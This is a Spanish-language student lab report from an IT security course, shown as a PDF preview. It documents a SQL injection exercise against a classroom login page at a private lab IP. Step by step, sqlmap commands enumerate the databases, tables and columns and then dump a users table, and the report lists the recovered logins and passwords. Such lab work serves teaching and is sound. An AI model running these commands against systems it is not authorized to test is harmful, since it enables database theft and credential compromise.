sql injection Fernando Zapata .pdf



Nombre del archivo original: sql injection_Fernando_Zapata.pdf
Título: SEGURIDAD Y ALTA DISPONIBILIDAD
Autor: alumno

Este documento en formato PDF 1.5 fue generado por Microsoft® Word 2010, y fue enviado en caja-pdf.es el 20/12/2015 a las 20:00, desde la dirección IP 87.219.x.x. La página de descarga de documentos ha sido vista 974 veces.
Tamaño del archivo: 676 KB (5 páginas).
Privacidad: archivo público



Vista previa del documento


SEGURIDAD Y
ALTA
DISPONIBILIDAD
2º ASIR

I.E.S. Lázaro Cárdenas

Autor: Fernando Zapata
2015

- SEGURIDAD Y ALTA DISPONIBILIDAD
Se selecciona la ruta del navegador

Al dar error, se quita la parte

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -dbs

Nos indica las bases de datos que existen

La que se va a sacar información es dbasir203

2

- SEGURIDAD Y ALTA DISPONIBILIDAD
Para sacar las tablas se selecciona la database con –D nombre_BBDD

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -D db2asir03 --tables

Se ve el resultado que contiene una table.

Se acceden a las columnas de la table usuarios

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user=--T
usuarios --columns

3

- SEGURIDAD Y ALTA DISPONIBILIDAD

Con la siguiente orden lo vuelcas a un fichero
sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -T usuarios --dump

Para sacar la clave y pass

sqlmap.py --url=http://172.26.104.41/carpetas_usuarios/2asir03/login.php?user= -T
usuarios --dump

4

- SEGURIDAD Y ALTA DISPONIBILIDAD
En esta table existian dos usuarios, como se puede ver en la foto. El escaneo fue más largo
por este motivo.
Aún así se puede ver como los login son
LOGIN PASSWORD
Asir03

teacher

Asir04

student

5


sql injection_Fernando_Zapata.pdf - página 1/5


sql injection_Fernando_Zapata.pdf - página 2/5


sql injection_Fernando_Zapata.pdf - página 3/5

sql injection_Fernando_Zapata.pdf - página 4/5
sql injection_Fernando_Zapata.pdf - página 5/5


Descargar el documento (PDF)

sql injection_Fernando_Zapata.pdf (PDF, 676 KB)





Documentos relacionados


Documento PDF sql injection fernando zapata
Documento PDF informacion aplicaci n cau
Documento PDF 3 uso e instalaci n de vshpere client
Documento PDF compartir ficheros en windows server
Documento PDF practica final 1
Documento PDF tema1ejercico creacionyadministracionejercicio

Palabras claves relacionadas